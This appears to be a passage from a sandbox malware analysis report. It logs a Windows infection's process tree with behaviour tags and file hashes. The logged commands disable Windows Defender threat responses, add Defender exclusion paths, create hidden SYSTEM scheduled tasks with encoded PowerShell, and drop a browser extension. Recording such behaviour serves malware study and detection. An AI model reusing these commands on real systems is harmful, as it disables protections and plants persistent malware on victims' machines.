C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5276
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XqNhwMJQcYnyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XqNhwMJQcYnyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ayDyxjcgnKyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ayDyxjcgnKyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fVkYttZyU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fVkYttZyU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fwiBLGEzLGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fwiBLGEzLGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OIjaVxaqIUZEwNVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OIjaVxaqIUZEwNVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\yWoKhxHXbBKfMGYUo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\yWoKhxHXbBKfMGYUo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xGrMXOUixmLVDPjY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xGrMXOUixmLVDPjY\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5796
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR" /t REG_DWORD /d 0 /reg:323⤵PID:436
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR" /t REG_DWORD /d 0 /reg:324⤵PID:4752
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR" /t REG_DWORD /d 0 /reg:643⤵PID:1144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XqNhwMJQcYnyC" /t REG_DWORD /d 0 /reg:323⤵PID:5808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XqNhwMJQcYnyC" /t REG_DWORD /d 0 /reg:643⤵PID:5788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ayDyxjcgnKyU2" /t REG_DWORD /d 0 /reg:323⤵PID:5972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ayDyxjcgnKyU2" /t REG_DWORD /d 0 /reg:643⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fVkYttZyU" /t REG_DWORD /d 0 /reg:323⤵PID:4068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fVkYttZyU" /t REG_DWORD /d 0 /reg:643⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fwiBLGEzLGUn" /t REG_DWORD /d 0 /reg:323⤵PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fwiBLGEzLGUn" /t REG_DWORD /d 0 /reg:643⤵PID:5828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OIjaVxaqIUZEwNVB /t REG_DWORD /d 0 /reg:323⤵PID:3680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OIjaVxaqIUZEwNVB /t REG_DWORD /d 0 /reg:643⤵PID:5952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\yWoKhxHXbBKfMGYUo /t REG_DWORD /d 0 /reg:323⤵PID:5356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\yWoKhxHXbBKfMGYUo /t REG_DWORD /d 0 /reg:643⤵PID:4888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xGrMXOUixmLVDPjY /t REG_DWORD /d 0 /reg:323⤵PID:4184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xGrMXOUixmLVDPjY /t REG_DWORD /d 0 /reg:643⤵PID:5812
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geVjajWXs" /SC once /ST 00:56:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4868 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4860
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geVjajWXs"2⤵PID:436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3680
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geVjajWXs"2⤵PID:1916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FjPrbMratJfuSiUHT" /SC once /ST 00:48:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\xGrMXOUixmLVDPjY\DOOFzsJgZpGQIfu\vzTkrui.exe\" 4X /tlGtdidyK 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FjPrbMratJfuSiUHT"2⤵PID:6128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4440 -ip 44401⤵PID:5392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4440 -ip 44401⤵PID:5472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4440 -ip 44401⤵PID:2028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4440 -ip 44401⤵PID:116
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:2356
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4648
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2704
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5012
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1360
-
C:\Windows\Temp\xGrMXOUixmLVDPjY\DOOFzsJgZpGQIfu\vzTkrui.exeC:\Windows\Temp\xGrMXOUixmLVDPjY\DOOFzsJgZpGQIfu\vzTkrui.exe 4X /tlGtdidyK 757674 /S1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4616
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5184
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2564
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:4284
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:2676
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5460
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4852
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:1884
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:2260
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2656
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:2992
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2108
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1052
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4724
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:1656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:6140
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bSfPZYmEQVWJjHQXDZ"2⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2088
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2872
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:6084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5708 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\fVkYttZyU\UnoYIQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cUMNvhAHshrjbpT" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cUMNvhAHshrjbpT2" /F /xml "C:\Program Files (x86)\fVkYttZyU\SeQNkFh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "cUMNvhAHshrjbpT"2⤵PID:5372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cUMNvhAHshrjbpT"2⤵PID:6052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RgELIkisZlxJYL" /F /xml "C:\Program Files (x86)\ayDyxjcgnKyU2\Zxqginc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ILLFHeQdtECib2" /F /xml "C:\ProgramData\OIjaVxaqIUZEwNVB\juoiUcq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hpAwFOtYigZqcJjyp2" /F /xml "C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR\waHGVDT.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TAIqkEckzjNRGSqXfCr2" /F /xml "C:\Program Files (x86)\XqNhwMJQcYnyC\IcIupcE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5592
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
640KB
MD5b6ca1865c43dea3a98ffe02631cff956
SHA16708902ea302ce7ffb0c637b45330106d5a36320
SHA256d15fbacfe4374d6a334a1c43c100252c90cc6e0d7d56a6ded73b863a2913b00e
SHA51296bbc3bcc14fdbcea1e5add946fb032bbee63edcaffb0720e19ee7c291e5d31c83cc6cc7a2b35ffb8a7accf7a5cb27a280bf095418b3533cf1556d67272e61f7
-
Filesize
2.0MB
MD5e4653135185fdf887a0d9a1cfb413be2
SHA17fc0adbc0978aa6d93880abaf28defaec8d1f470
SHA2567d4df30ef8d36a1aff9d6d63bb1cbaadfdfb0efeb91271fd11bd14e1941ec159
SHA512dd97d379738f35a209f5003d00b4c514d15841a3fd1df7d11ae93684f602eb75310e13080bc1a373030538265673a9365e117103378fd8d1150d6bc7985acf16
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
Filesize150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA5122439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json
Filesize161B
MD55c5a1426ff0c1128c1c6b8bc20ca29ac
SHA10e3540b647b488225c9967ff97afc66319102ccd
SHA2565e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA5121f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
152B
MD58b2290ca03b4ca5fe52d82550c7e7d69
SHA120583a7851a906444204ce8ba4fa51153e6cd494
SHA256f9ff4871fc5317299de907489d466e630be63d698c8f7cb77cc81faddbecc6d2
SHA512704ec8122cc1c263dff67ddbb5c20ee0db8a438674d716bc3be5b266ee5629a219b0049d721f9eb2dd8f2d8fda0163659eaa4d3e1f0a6e9072a8ffb92bb2b25d
-
Filesize
152B
MD5919c29d42fb6034fee2f5de14d573c63
SHA124a2e1042347b3853344157239bde3ed699047a8
SHA25617cd6de97a0c020cb4935739cfef4ec4e074e8d127ac4c531b6dc496580c8141
SHA512bb7eadd087bbcec8b1b8a49b102b454333f2f9708d36b6ffc3c82fdc52e46873398d967238c3bfe9ac6caef45b017a5fe3938ebf5f3053e4ef9be7b2752b563d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD5422f7938adb414de5787b816274e337a
SHA1f82682342ee88adc61f848950928dec47cb1c3e6
SHA256ca3be1d77f42f3215f691d781b0dc1ab46a9dcc5cdd20d6bef51f4dadaa7757a
